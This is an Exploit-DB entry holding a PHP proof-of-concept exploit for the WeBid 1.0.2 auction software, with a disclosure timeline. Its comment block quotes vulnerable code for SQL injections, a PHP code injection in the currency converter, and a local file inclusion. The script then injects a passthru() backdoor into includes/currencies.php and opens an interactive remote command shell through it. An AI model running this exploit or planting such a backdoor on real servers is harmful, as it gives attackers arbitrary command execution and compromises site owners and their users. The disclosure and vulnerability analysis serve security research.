WeBid 1.0.2 - 'converter.php' Remote Code Execution

EDB-ID:

17487

CVE:



Author:

EgiX

Type:

webapps


Platform:

PHP

Date:

2011-07-04


<?php

/*

	------------------------------------------------------------
	WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit
	------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	link.....: http://www.webidsupport.com/
    
	
	This PoC was written for educational purpose. Use it at your own risk.
	Author will be not responsible for any damage.
	
	
	[-] Vulnerable code to SQL injection in feedback.php:
	
	154.	$query = "SELECT title FROM " . $DBPrefix . "auctions WHERE id = " . $_REQUEST['auction_id'] . " LIMIT 1";
	155.	$res = mysql_query($query);
	156.	$system->check_mysql($res, $query, __LINE__, __FILE__);
	157.	$item_title = mysql_result($res, 0, 'title');
	
	Input passed through $_REQUEST['auction_id'] isn't properly sanitised before being used in the SQL query at line 154.

	[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in logout.php:

	21.	if (isset($_COOKIE['WEBID_RM_ID']))
	22.	{
	23.	        $query = "DELETE FROM " . $DBPrefix . "rememberme WHERE hashkey = '" . $_COOKIE['WEBID_RM_ID'] . "'";
	24.	        $system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
	25.	        setcookie('WEBID_RM_ID', '', time() - 3600);
	26.	}

	Input passed through $_COOKIE['WEBID_RM_ID'] isn't properly sanitised before being used in the SQL query at line 23.

	
	[-] Vulnerable code to SQL injection (works with magic_quotes_gpc = off) in user_login.php:

	84.			if (isset($_COOKIE['WEBID_ONLINE']))
	85.			{
	86.				$query = "DELETE from " . $DBPrefix . "online WHERE SESSION = '" . $_COOKIE['WEBID_ONLINE'] . "'";
	87.				$system->check_mysql(mysql_query($query), $query, __LINE__, __FILE__);
	88.			}

	Input passed through $_COOKIE['WEBID_ONLINE'] isn't properly sanitised before being used in the SQL query at line 86.

	[-] Vulnerable code to arbitrary PHP code jnjection (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

	61.	function buildcache($newaarray)
	62.	{
	63.	        global $include_path;
	64.	
	65.	        $output_filename = $include_path . 'currencies.php';
	66.	        $output = "<?php\n";
	67.	        $output.= "\$conversionarray[] = '" . time() . "';\n";
	68.	        $output.= "\$conversionarray[] = array(\n";
	69.	
	70.	        for ($i = 0; $i < count($newaarray); $i++)
	71.	        {
	72.	                $output .= "\t" . "array('from' => '" . $newaarray[$i]['from'] . "', 'to' => '" . $newaarray[$i]['to'] . "', 'rate' => '" . $newaarray[$i]['rate'] . "')";
	73.	                if ($i < (count($newaarray) - 1))
	74.	                {
	75.	                        $output .= ",\n";
	76.	                }
	77.	                else
	78.	                {
	79.	                        $output .= "\n";
	80.	                }
	81.	        }
	82.	
	83.	        $output .= ");\n?>\n";
	84.	
	85.	        $handle = fopen($output_filename, 'w');
	86.	        fputs($handle, $output);
	87.	        fclose($handle);
	88.	}

	Input passed to buildcache() function through $_POST['from'] or $_POST['to'] isn't properly sanitised before being
	written to currencies.php file, this can lead to arbitrary PHP code injection.

	[-] Vulnerable code to LFI (works with magic_quotes_gpc = off) in /includes/converter.inc.php:

	18.	if (isset($_GET['lan']) && !empty($_GET['lan']))
	19.	{
	20.	        if ($user->logged_in)
	21.	        {
	22.	                $query = "UPDATE " . $DBPrefix . "users SET language = '" . mysql_real_escape_string($_GET['lan']) . "' WHERE id = " . $user->user_data['id'];
	23.	        }
	24.	        else
	25.	        {
	26.	                // Set language cookie
	27.	                setcookie('USERLANGUAGE', $_GET['lan'], time() + 31536000, '/');
	28.	        }
	29.	        $language = $_GET['lan'];
	30.	}
	31.	elseif ($user->logged_in)
	32.	{
	33.	        $language = $user->user_data['language'];
	34.	}
	35.	elseif (isset($_COOKIE['USERLANGUAGE']))
	36.	{
	37.	        $language = $_COOKIE['USERLANGUAGE'];
	38.	}
	39.	else
	40.	{
	41.	        $language = $system->SETTINGS['defaultlanguage'];
	42.	}
	43.	
	44.	if (!isset($language) || empty($language)) $language = $system->SETTINGS['defaultlanguage'];
	45.	
	46.	include $main_path . 'language/' . $language . '/messages.inc.php';

	Input passed through $_GET['lan'] or $_COOKIE['USERLANGUAGE'] parameter isn't properly sanitised before

	being used to include files on line 46. This can be exploited to include arbitrary local files.

	[-] Information leak vulnerability into /logs directory, cause anyone can read cron.log and error.log


	[-] Disclosure timeline:

	[19/06/2011] - Vulnerabilities discovered
	[19/06/2011] - Vendor contacted
	[20/06/2011] - Vendor contacted again
	[21/06/2011] - No response from vendor
	[21/06/2011] - Issue reported to http://sourceforge.net/apps/mantisbt/simpleauction/view.php?id=34
	[22/06/2011] - Issue reported to http://www.webidsupport.com/forums/project.php?do=issuelist&projectid=1
	[22/06/2011] - Vendor responsed and released patches: http://www.webidsupport.com/forums/showthread.php?3892
	[04/07/2011] - Public disclosure

*/

error_reporting(E_ERROR);
set_time_limit(0);

if (!extension_loaded("curl")) die("cURL extension required\n");

$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_VERBOSE, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

function http_post($page, $data)
{	
	global $ch, $url;
	
	curl_setopt($ch, CURLOPT_URL, $url.$page);
	curl_setopt($ch, CURLOPT_POST, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $data);

	return curl_exec($ch);
}

print "\n+----------------------------------------------------------------------+";
print "\n| WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------+\n";

if ($argc < 2)
{
	print "\nUsage......: php $argv[0] <url>\n";
	print "\nExample....: php $argv[0] https://localhost/";
	print "\nExample....: php $argv[0] http://localhost/webid/\n";
	die();
}

$url = $argv[1];

$code = rawurlencode("\0'));print('_code_');passthru(base64_decode(\$_POST['c'])//");
http_post("converter.php", "action=convert&from=USD&to={$code}");

while(1)
{
	print "\nwebid-shell# ";
	if (($cmd = trim(fgets(STDIN))) == "exit") break;
	preg_match("/_code_(.*)/s", http_post("includes/currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n");
}
?>